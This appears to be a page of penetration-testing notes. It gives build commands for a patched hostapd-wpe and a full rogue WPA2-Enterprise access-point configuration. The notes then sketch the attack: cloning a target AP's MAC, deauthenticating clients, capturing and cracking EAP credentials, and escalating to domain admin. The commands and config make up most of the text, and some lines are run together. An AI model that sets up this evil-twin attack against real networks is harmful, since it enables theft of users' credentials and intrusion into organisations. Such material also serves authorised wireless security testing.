HOSTAPD-WPE
apt-get install libssl-dev libnl-genl-3-dev libnl-3-dev pkg-config libsqlite3-dev build-essential wget --no-install-recommendsDownload the files:
wget https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/hostapd-wpe/hostapd-2.10-wpe.patch
wget https://w1.fi/releases/hostapd-2.10.tar.gz
tar -zxf hostapd-2.10.tar.gz
cd hostapd-2.10
patch -p1 < ../hostapd-2.10-wpe.patch
cd hostapdmake
make install
make wpeCreating certs
cd /etc/hostapd-wpe/certs
./bootstrap
make installvim wpeattackap.conf
└─$ cat wpe_custom.conf
# ------------------------------
# common hostapd configuration
# ------------------------------
interface=wlan0mon
ssid=XX-AP #name of the app (even it is hidden)
channel=4
hw_mode=g
# --------------------
# WPA configuration
# --------------------
wpa=2 # use WPA2 version
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
# --------------------------
# EAP server configuration
# --------------------------
ieee8021x=1 # requires 802.1x authentication server
eapol_key_index_workaround=0 # EAPOL key index fix for WinXP supplicant (disabled here)
eap_server=1 # enable integrated EAP server instead of RADIUS
#eap_user_file=fakenet.eap_user # filename containing information of users
# -------------------------------------------------
# certificate configuration for EAP-TLS/PEAP/TTLS
# -------------------------------------------------
#ca_cert=/root/certs/ca.pem
#server_cert=/root/certs/server.pem
#private_key=/root/certs/server.key # private key for the server certificate
#private_key_passwd= # password used to encrypt the private key (empty here)
#dh_file=/root/certs/dhparam.pem # file path to DH/DSA parameters file (in PEM format)
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh
# -----------------------------
# mana specific configuration
# -----------------------------
#mana_wpe=1 # enable WPE mode to intercept various EAP credentials
#mana_eapsuccess=1 # return EAP success to the clients, and have them connect
Use the same MAC of target APP
Deauth (with MAC clone, deauth is not necessary if signal is strong \m/)
GOTCHA!
Cracking it!

Getting Domain Admin From WiFI Scratch Approach \o/
As the SSID is hidden, the "hidden" network can be created.




Reference
Last updated
Was this helpful?